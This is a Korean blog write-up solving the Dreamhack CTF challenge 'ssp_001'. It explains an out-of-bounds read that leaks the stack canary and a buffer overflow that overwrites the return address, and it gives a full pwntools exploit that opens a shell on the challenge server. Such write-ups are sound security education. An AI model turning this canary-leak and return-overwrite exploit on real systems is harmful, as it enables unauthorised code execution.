[dreamhack] ssp_001 문제풀이

환경 세팅 

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
void print_box(unsigned char *box, int idx) {
    printf("Element of index %d is : %02x\n", idx, box[idx]);
}
void menu() {
    puts("[F]ill the box");
    puts("[P]rint the box");
    puts("[E]xit");
    printf("> ");
}
int main(int argc, char *argv[]) {
    unsigned char box[0x40] = {};
    char name[0x40] = {};
    char select[2] = {};
    int idx = 0, name_len = 0;
    initialize();
    while(1) {
        menu();
        read(0, select, 2);
        switch( select[0] ) {
            case 'F':
                printf("box input : "); 
                read(0, box, sizeof(box));
                break;
            case 'P':
                printf("Element index : ");
                scanf("%d", &idx);
                print_box(box, idx); # 취약점 1 (box의 idx 위치 값 출력) 
                break;
            case 'E':
                printf("Name Size : ");
                scanf("%d", &name_len);
                printf("Name : ");
                read(0, name, name_len); # 취약점 2 (BOF) 
                return 0;
            default:
                break;
        }
    }
}

취약점 분석

1.  P : box의 index에 맞는 값을 출력해줌 (box값을 넘어서는 값도 출력이 가능하므로 이걸 통해 카나리 값을 알아낼 수 있다.)

2. E : name_len만큼 name을 read 할 수 있게 해놓았으므로 스택 버퍼 오버플로우가 가능하다.  

 

즉, 카나리 릭이 가능하다.

스택구조를 gdb를 통해 값을 입력하면서 디버깅 해보니 

 

index(4) ebp-0x8a 

----------------------

namelen(4)

----------------------

select(2)

----------------------

box(0x40) ebp-0x88 (esp) 

----------------------

name(0x40) ebp-0x48 

----------------------

canary (4)

----------------------

rdi(4)

----------------------

sfp(4)

----------------------

ret

 

대충 이런 느낌이었다. 

스택 구조는 레지스터 정보( i r ) 과 rbp 와의 offset을 보고 구했다. 

 

<익스플로잇 시나리오>

1.  32bit 환경이기 때문에 4번 P 접근해서 buf의 인덱스로 4byte의 카나리값 가져와야함 

2. E에서 버퍼오버플로우를 통해 ret까지 덮어쓰고 그 이후에 셸코드 함수를 ret에 넣어줌 

 

 

exploit 코드 

from pwn import *

p = remote("host1.dreamhack.games",13064)
context.arch = "i386"
elf = ELF("./ssp_001")

get_shell = elf.symbols['get_shell'] 

# TODO : F (box input 입력)
p.sendlineafter("> ", "F")
p.sendlineafter("box input : ", "A"*0x40)
    
idx = 128 # box와 canary 사이의 offset 0x80 
canary = b""

# TODO : P (buf index 값 출력) -> canary 추출 
for i in range(4):
    p.sendlineafter("> ", "P")
    p.sendlineafter("Element index : ",str(idx+i))
    p.recvuntil("is : ")
    canary = p.recvuntil('\n')[0:2] + canary

print("canary: ",canary)
canary = int(canary,16)

p.sendlineafter("> ", "E")

payload = b'A' * 0x40 # name
payload += p32(canary) # canary
payload += b'B' * 0x08 # rdi + sfp 
payload += p32(get_shell) # ret 

p.sendlineafter("Name Size : ", str(len(payload)))
p.sendlineafter("Name : ", payload)

p.interactive()